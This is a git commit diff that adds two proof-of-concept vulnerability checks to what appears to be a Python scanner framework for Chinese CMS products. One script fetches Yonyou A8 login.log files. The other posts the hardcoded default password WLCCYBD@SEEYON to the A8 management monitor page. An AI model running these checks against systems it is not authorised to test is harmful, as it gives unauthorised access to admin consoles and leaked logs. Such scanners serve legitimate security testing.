add poc

2017-07-19 15:26:18 +08:00
parent 9d683b5fdd
commit 0cb9a3cb04
13 changed files with 82 additions and 4 deletions
--- a/.history
+++ b/.history
@@ -1,4 +0,0 @@
-1|discuz_forum_message_ssrf
-2|discuz_focus_flashxss
-3|discuz_x25_path_disclosure
-4|discuz_plugin_ques_sqli
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -109,6 +109,8 @@ from cms.yonyou.yonyou_u8_CmxItem_sqli import yonyou_u8_CmxItem_sqli_BaseVerify
 from cms.yonyou.yonyou_fe_treeXml_sqli import yonyou_fe_treeXml_sqli_BaseVerify
 from cms.yonyou.yonyou_ehr_resetpwd_sqli import yonyou_ehr_resetpwd_sqli_BaseVerify
 from cms.yonyou.yonyou_nc_NCFindWeb_fileread import yonyou_nc_NCFindWeb_fileread_BaseVerify
+from cms.yonyou.yonyou_a8_logs_disclosure import yonyou_a8_logs_disclosure_BaseVerify
+from cms.yonyou.yonyou_status_default_pwd import yonyou_status_default_pwd_BaseVerify

 #v2tech vulns
 from cms.v2tech.v2Conference_sqli_xxe import v2Conference_sqli_xxe_BaseVerify
--- a/cms/discuz/discuz_plugin_ques_sqli.py
+++ b/cms/discuz/discuz_plugin_ques_sqli.py
--- a/cms/discuz/discuz_x25_path_disclosure.py
+++ b/cms/discuz/discuz_x25_path_disclosure.py
--- a/cms/yonyou/yonyou_a8_logs_disclosure.py
+++ b/cms/yonyou/yonyou_a8_logs_disclosure.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: 用友a8 log泄露
+referer: http://wooyun.tangscan.cn/static/bugs/wooyun-2014-081757.html
+author: Lucifer
+description: 用友a8 logs目录中多个log文件可访问。
+'''
+import sys
+import re
+import requests
+import warnings
+from termcolor import cprint
+
+class yonyou_a8_logs_disclosure_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payloads = ["/logs/login.log", 
+                    "/seeyon/logs/login.log"]
+        try:
+            for payload in payloads:
+                vulnurl = self.url + payload
+                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+                pattern = re.search("[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}", req.text)
+                if pattern:
+                    cprint("[+]存在用友a8 log泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = yonyou_a8_logs_disclosure_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/cms/yonyou/yonyou_status_default_pwd.py
+++ b/cms/yonyou/yonyou_status_default_pwd.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: 用友a8监控后台默认密码漏洞
+referer: http://www.wooyun.org/bugs/wooyun-2015-0157458
+author: Lucifer
+description: 路径seeyon/management/status.jsp存在默认密码WLCCYBD@SEEYON。
+'''
+import sys
+import json
+import requests
+import warnings
+from termcolor import cprint
+
+class yonyou_status_default_pwd_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        post_data = {"password":"WLCCYBD@SEEYON"}
+        payloads = {"/seeyon/management/index.jsp",
+                    "/management/index.jsp"}
+        try:
+            for payload in payloads:
+                vulnurl = self.url + payload
+                req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
+                if r"A8 Management Monitor" in req.text and r"Connections Stack Trace" in req.text:
+                    cprint("[+]存在用友a8监控后台默认密码漏洞...(高危)\tpayload: "+vulnurl+"\tpost: "+json.dumps(post_data), "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = yonyou_status_default_pwd_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/information/jetbrains_ide_workspace_disclosure.py
+++ b/information/jetbrains_ide_workspace_disclosure.py
--- a/pocdb.py
+++ b/pocdb.py
@@ -97,6 +97,8 @@ class pocdb_pocs:
            "用友CRM系统任意文件读取":yonyou_getemaildata_fileread_BaseVerify(url),
            "用友EHR 任意文件读取":yonyou_ehr_ELTextFile_BaseVerify(url),
            "用友优普a8 CmxUserSQL时间盲注入":yonyou_a8_CmxUser_sqli_BaseVerify(url),
+            "用友a8 log泄露":yonyou_a8_logs_disclosure_BaseVerify(url),
+            "用友a8监控后台默认密码漏洞":yonyou_status_default_pwd_BaseVerify(url),
            "用友致远A8协同系统 blind XML实体注入":yonyou_a8_personService_xxe_BaseVerify(url),
            "用友GRP-U8 sql注入漏洞":yonyou_cm_info_content_sqli_BaseVerify(url),
            "用友u8 CmxItem.php SQL注入":yonyou_u8_CmxItem_sqli_BaseVerify(url),
--- a/system/mongodb/init.py
+++ b/system/mongodb/init.py
--- a/system/mongodb/mongodb_unauth.py
+++ b/system/mongodb/mongodb_unauth.py
--- a/system/resin/init.py
+++ b/system/resin/init.py
--- a/system/resin/resin_viewfile_fileread.py
+++ b/system/resin/resin_viewfile_fileread.py
--- a/system/smtp/init.py
+++ b/system/smtp/init.py